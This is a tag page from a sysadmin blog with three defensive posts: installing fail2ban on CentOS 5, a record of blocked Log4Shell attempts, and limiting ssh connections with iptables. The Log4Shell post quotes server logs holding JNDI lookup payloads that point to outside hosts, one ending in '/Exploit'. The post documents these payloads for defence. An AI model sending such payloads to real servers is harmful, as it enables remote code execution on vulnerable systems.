3 posts tagged 'fail2ban'

  1. 2023.12.21 Installing fail2ban on CentOS 5
  2. 2021.12.16 First Log4shell attack seen, and more
  3. 2021.05.22 Restricting ssh access with iptables

2023. 12. 21. 19:23 WorkHolic

Installing fail2ban on CentOS 5

fail2ban is a good way to block brute-force ssh login attempts.
Install it as follows.

1. Install the EPEL repo

CentOS/RHEL 5, 64 Bit (x86_64):
# rpm -Uvh http://dl.fedoraproject.org/pub/archive/epel/5/x86_64/epel-release-5-4.noarch.rpm


2. Install fail2ban

yum install fail2ban


3. Edit /etc/fail2ban/jail.conf

[ssh-iptables]

enabled  = true
filter   = sshd
action   = iptables[name=SSH, port=ssh, protocol=tcp]
           sendmail-whois[name=SSH, dest=you@example.com, sender=fail2ban@example.com, sendername="Fail2Ban"]
logpath  = /var/log/secure
maxretry = 5

4. Start the service

/etc/init.d/fail2ban start

[root@kl151 fail2ban]# /etc/init.d/fail2ban start
Starting fail2ban:                                         [  OK  ]
[root@kl151 fail2ban]# fail2ban-client status
Status
|- Number of jail:      1
`- Jail list:           ssh-iptables

 

#CentOS5 #fail2ban

Posted by gromet

2021. 12. 16. 17:38 WorkHolic

First Log4shell attack seen, and more

Confirmed the first log4shell attack against a server I manage.

 

[11/Dec/2021:07:14:50 +0900] [xxx.xxx.xxx.189/sid#a353cf0][rid#b571a40][/${jndi:ldaps://41e1e3ec.probe001.log4j.leakix.net:8443/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:34 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b3a2cd0][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]
[11/Dec/2021:12:46:35 +0900] [xxx.xxx.xxx.142/sid#a64c530][rid#b18e3d8][/${jndi:ldaps://6c60d031.probe001.log4j.leakix.net:1266/b}][1] Access denied with code 400 (phase 2). Pattern match "^[\d\.]+$" at REQUEST_HEADERS:Host. [file "/etc/httpd/modsecurity.d/modsecurity_crs_21_protocol_anomalies.conf"] [line "60"] [id "960017"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"]

 

Detection after setting up fail2ban to block Log4Shell

 

The IP 121.4.56.143 has just been banned by Fail2Ban after
1 attempts against apache-log4j.


Here is more information about 121.4.56.143:



Lines containing IP:121.4.56.143 in /var/log/httpd/*access_log

/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:51 +0900] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "POST /login HTTP/1.1" 400 226
/var/log/httpd/ssl_xxxx_access_log:121.4.56.143 - - [16/Dec/2021:17:08:52 +0900] "GET / HTTP/1.1" 400 226


#log4shell #log4j #fail2ban

Posted by gromet

2021. 05. 22. WorkHolic

Restricting ssh access with iptables

Unauthorised ssh login attempts (brute force) have been going on steadily for a long time.
A server with no password, or a password that is far too easy, can be logged into and then used as a playground.

These days I block such attempts with Fail2Ban,
but in the past I tried to block them with iptables.
I want to keep a record of that here.

--Code--
iptables -A INPUT -p tcp --dport 22 --syn -m limit --limit 1/m --limit-burst 3 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 --syn -j DROP
----------
That limits ssh connections from a particular IP to 3 per minute.
If they connect more quickly than that (say in an ssh brute force attack) it simply drops their packets.

 

Searching around, the site below has a detailed explanation that is a useful reference.
https://sata.kr/entry/IPTables-10-IPTables로-Flooding-공격을-막아보자-4-INPUT-limit?category=778791 [SATAz BLOG]


#iptables #BruteForeceAttack #sshAttack #fail2ban
Posted by gromet